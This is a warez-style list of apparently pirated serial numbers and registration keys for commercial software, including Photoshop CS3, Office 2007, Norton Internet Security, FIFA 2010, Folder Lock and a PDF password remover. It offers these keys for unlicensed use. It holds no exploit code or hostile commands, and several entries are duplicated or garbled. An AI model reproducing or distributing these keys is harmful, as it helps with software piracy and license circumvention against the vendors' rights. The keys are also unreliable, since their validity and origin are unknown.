Name: sharyn kolibob

Serial: 000016-9P0U6X-N5BBFB-EH9ZTE-DEZ8P0-9U4R72-RGZ6PF-EMYUAZ-9J6XQQ-89BV1Z


========================================================================



Adobe Photoshop CS3 Master Collection Serial

Serial: 1325-1164-8142-5014-6460-3938

========================================================================
PasswordUnlocker PDF Password Remover 5.0.0

Serial: hzNHEuQvcGvzRyVJHgv9pyiki7kbTQymwmCViiUCjEO0UQmchDw8NwjlmHE09nDe2ztZrUJ3UUtvoQY2CdDIQbzQKzoC0ae7+w3EvYYd9W1UPJ2+1a6z42vAxCf231nV2Mn4A+601rPJwnqJa2FK7kZJOFr3NszWprjzsFAdQgw=


========================================================================
Microsft office 2007 enterprise 32 bit

Serial: F3DJD-6FFQ4-XQTQF-PGK47-8MDQ8

CM9R7-9X4DV-F43J4-JVC67-GYDQ8


========================================================================
bitdefender free edition v10oem


Serial: 7C7CC-DCA97-71242-F0814


========================================================================
FIFA 2010

Serial: URU4-HVRD-G8H7-F7G4-1911
KKHH-FRTB-L1M2-F5V8-1911
URKK-F9Y4-G5U8-33Q1-1911
PMXP-49L2-D1G2-85L0-1911
J87P-39P7-W8J4-T3F7-1911

========================================================================
Folder Lock 7.1.1 Final


serial key: F7-20120725-2-873991

registration: 58260C22969C0EE8C65E3CB20460E4F44A063486


serial key: F7-20120725-3-968359

registration: 4E3A626E0EE4E0CEDE30EE22509858386C7A7CEA


serial key: F7-20120725-8-354379

registration :76F60EB08CE6186A88C2E4AE646EAEA8147E4052


serial key: F7-20120725-3-339758

registration :C6E26644AA4AA606CC00B46206B2FC129EB256B0



serial key: F7-20120725-1-691441

registration :5AB890E642D6400C1678D0640E9E88CA26FA88C4


serial key: F7-20120725-3-663346

registration :8AC2E8BAC028EAA26042C018B8B4A6B8F46A1AAA


serial key: F7-20120725-9-295215

registration :B6EA60745C24DE70769A1EC4FCD62C5CD8E8FC6A


serial key: F7-20120725-4-188913

registration :9CAEC42C5E74CE10065A20D85410601EC4007CFA


serial key: F7-20120725-6-219585

registration :9A98B6FC12A60E621E462AAE4EAE70AED4126002


serial key: F7-20120725-1-869828

registration :8242FA5E14AE88C89EACF6964068121A2264BCC2


serial key: F7-20120725-4-863538

registration :D090E2729622027884288C1E1E46DCC81CD4FE30


serial key: F7-20120725-8-475696

registration :42C85E9E8620E404F25412C4EA6852944EA4CA88


serial key: F7-20120725-9-222467

registration :7E52F24C3254C40A3802A6924E44B0A21A3060C0


serial key: F7-20120725-4-436627

registration :7A52720C8E12A0A80CF8FE9ABA1094089C6EB034


serial key: F7-20120725-5-224353

registration :7CEA8028A8F808569AB0AAFECC98B2E896302882


serial key: F7-20120725-7-112789

registration :784C1ABE7AAAC8E80680F8BAF00292DE4CDCC4DE


serial key: F7-20120725-6-137291

registration :F6FA767AE2DEBCCA1AF64A4E0C88B82844781E94


serial key: F7-20120725-1-619748

registration :82C820C8825CF4B4D8F8BA46D42EA4A2CAC41A8


========================================================================
MP3 Encoder 1.0

s/n: _23456789a_ydcgwvaf
s/n: _23456789a_ydcgwvaf

========================================================================
Defrag Professional Edition 4.0.508

Name: Hans Mueller
License: DPM1-0VNZ-002Q-X32X-033Y

Name: Hans Mueller
License: DPM1-0VNZ-002Q-X32X-033Y


========================================================================
TraceRoute 2.0.2

s/n: Key-B03-30-230-209-164-3899
s/n: Key-B03-30-230-209-164-3899

========================================================================
Norton Internet Security 2012

Serial: JT888GWHQ7RQ32B932BB89XJM Only 1 User !

========================================================================

Angry Birds Space

Serial: THET-ALEV-LEFR-USWO OR 00a00b00c00d

========================================================================

PC Optimizer Pro

Serial: XUV4-9MP-6AFC-NN8-7NP|XUV4-9MP-6AFC-NN8-7NR


========================================================================